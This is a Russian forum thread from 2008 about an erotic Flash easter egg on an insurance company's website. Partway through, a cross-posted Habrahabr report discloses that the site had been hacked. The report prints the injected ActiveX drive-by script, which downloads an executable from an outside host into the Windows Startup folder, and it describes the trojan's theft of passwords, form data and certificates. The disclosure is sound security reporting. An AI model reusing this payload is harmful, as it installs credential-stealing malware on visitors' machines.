Помощь - Поиск - Пользователи - Календарь
Полная версия этой страницы: easter egg от Альфа-Страхования
GAMEINATOR forums > Мир вне игр > Клуб свободных тем
D&S
это ппц просто)) Я всегда знал, что альфа-групп не так прост)))

]]>http://www.alfastrah.ru/]]>

идем по ссылке, жмем 5-7 раз подряд мышом на 0 в телефоне в верхнем правом углу и .... o_O.gif а потом laugh.gif laugh.gif laugh.gif только дождитесь пока все загрузится
SaneX
laugh.gif laugh.gif laugh.gif
M i k e
жесть))))
Алекс
аааааааааа!!!!!! laugh.gif D&S, ну ты жжош!
я вить на работе сижу, да и колонки на всю включены.... biggrin.gif
centrino
WTF?!! laugh.gif
D&S
мне вот интересно..это у них такая тип рекламная компания...или просто их программисты отожгли)))
centrino
реклама, конечно smile.gif
Fullmetal
Пацталом lol.gif
dev1ce
Не пашет, что там за яйцо?
Алекс
Цитата(dev1ce @ 25.11.2008, 12:56) *
Не пашет, что там за яйцо?

включи флэш
D&S
Цитата(Alexpc @ 25.11.2008, 16:59) *
Цитата(dev1ce @ 25.11.2008, 12:56) *
Не пашет, что там за яйцо?

включи флэш

для тех у кого по каким то причинам не срабатывает:

меню до кликов: ]]>http://www.alfastrah.ru/flash/top_menu/menu_ru.swf]]>
меню после кликов: ]]>http://www.alfastrah.ru/flash/top_menu/menu_swingers.swf]]>

энджой cool.gif
Sotis
МегаЛОЛ!!! laugh.gif йа плакалъ, tatice_03.gif rofl.gif lol.gif шутники, ёклмн )))))


D&S, спасибо за ссылки, а то сам сайт еле грузится
Коша
Бугога!!! С чувством юмора у этой страховой компании всё в порядке laugh.gif
Rex
Изменённое меню не работает - не двигается z_cry.gif
centrino
я понял - сайт кто-то хакнул laugh.gif
RaGEheaveN
Ваще супер smile.gif Теперь на сайтах страховых компаний нужно тыкать на нолик smile.gif Вдруг там тоже чёнить замутили...

ЗЫ: Мегаотжег! biggrin.gif
Крендель
biggrin.gif Лолище!!!! Наконецто посмотрел biggrin.gif Всё, если что, страхуюсь только у них laugh.gif
ShimeR VVV
Сижу в комнате с родителями, у меня ноут, захожу по ссылке и тут блин ТАКОЕ laugh.gif Родители на меня вот так смотрели o_O.gif
Человек Поезд
Ахахах laugh.gif
Sviborg
Хэх, ну и рекламка laugh.gif
Vovka
ахаха прикона))))
Sotis
ВНИМАНИЕ!

Кросспост, источник: © ]]>Хабрахабр]]>

Два дня назад на сайте alfastrah.ru появилось так называемое «пасхальное яйцо» — если кликнуть 5-6 раз на номер телефона в правом верхнем углу в шапке сайта начинал играть ролик эротического содержания. Подробно детали вирусной акции описаны здесь.

Не секрет, что вирусный маркетинг ориентирован на очень быстрое распространение — заходы на сайт росли по экспоненте. На некоторых форумах появились предупреждения о том, что при заходе на сайт Касперский ругается и говорит, что на сайте сидит троян. В разговоре с сотрудниками лаборатории Касперского эта информация подтвердилась. Таким образом, «вирусный маркетинг» обернулся буквально вирусным. Привожу некоторые экспертные комментарии.


Анализ сайта показал, что, помимо эротического мультика, там сидит и вирус. Интересен способ внедрения: он вставлен аккуратно в центр страницы. Грузит вот что (скрипт даже не зашифрован):
script
HTTP/1.1 200 OK
Date: Tue, 25 Nov 2008 15:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 475
Connection: close
Content-Type: text/html
<object classid=«clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9» id=«attack»></object>
<script>
var arbitrary_file = «google-analyze.com/tracker/load.php»;
var destination = 'c:/Documents and Settings/All Users/Start Menu/Programs/StartUp/browsser.exe';
attack.SnapshotPath = arbitrary_file;
attack.CompressedPath = destination;
attack.PrintSnapshot(arbitrary_file,destination);
</script>
<embed src=«pdf.php» type=«application/pdf» width=100 height=100></embed>


У вируса есть особенность – блокировка загрузки при повторном посещении – вирус попадает на комп только при первой загрузке с какого-нибудь айпишника, при повторных уже нет. Так что если смотрят из конторы, где ходят через прокси – пострадает только первый посмотревший.
Для внедрения на сайт была использована незакрытая уязвимость.

Зверь один-в-один повторяет PoC, опубликованный тут: ]]>http://www.xakep.ru/post/44605/Microsoft-A...rol-Exploit.txt]]>

В функционал бота, помимо стандартных процедур инсталляции себя в систему, внедрения в запущенные процессы, борьбы с некоторыми антивирусами, предоставления услуг анонимного socks- и http прокси-сервера, входит и мощнейшая процедура кражи информации:
Троянец ворует содержимое Protected Storage, в котором содержатся пользовательские пароли.
Формграббер. Троянец перехватывает любые отправляемые через браузер данные, вводимые в формы. Контролируемые адреса, с которых перехватывается информация, — это, как правило, адреса банков и платежных систем. Таким образом происходит кража аккаунтов.
Обход виртуальных клавиатур. Троянец перехватывает нажатие кнопки мыши и делает скриншот экрана в этот момент.
Подмена сайтов и страничек. Это весьма интересный способ, ранее использовавшийся именно в Nuclear Grabber. При попытке пользователя выйти на один из сайтов, обращение к которым контролируется троянцем, происходит либо редирект запроса на поддельный фишинговый сайт, либо добавление в оригинальную страницу сайта нового поля для ввода данных. Содержимое страницы подменяется прямо на компьютере пользователя, еще до отображения в браузере!
Кража сертификатов.

Несмотря на обращения в Альфа-страхование со стороны ЛК и других лиц (я сам, например, 2 письма им написал), уязвимость все еще не устранена, а на сайте висит троян — уже вроде бы новый.

Хочу поблагодарить сотрудников лаборатории Касперского за оперативность и технические комментарии.
Алекс
Sotis, ах круть, а я думаю чего ет у мя тогда анивирь чертыхнулся...
centrino
это типа антивирусная антиреклама? laugh.gif rolleyes.gif
Undertaker
А в Висте судя по всему он не проявляется не как.
centrino
Цитата
kellas 26 ноября 2008, 14:32 # ↓ +1
да кстати, кто в курсе, как этот вирус можно спалить? я думаю он не на одном сайте.
superhabra 26 ноября 2008, 15:05 # ↑ ↓ +9
Записать на флешку, и в костёр..


]]>http://habrahabr.ru/blogs/infosecurity/45546/]]>
laugh.gif

update

а ролика на сайте альфастраха уже нет wink.gif
Для просмотра полной версии этой страницы, пожалуйста, пройдите по ссылке.
Форум IP.Board © 2001-2024 IPS, Inc.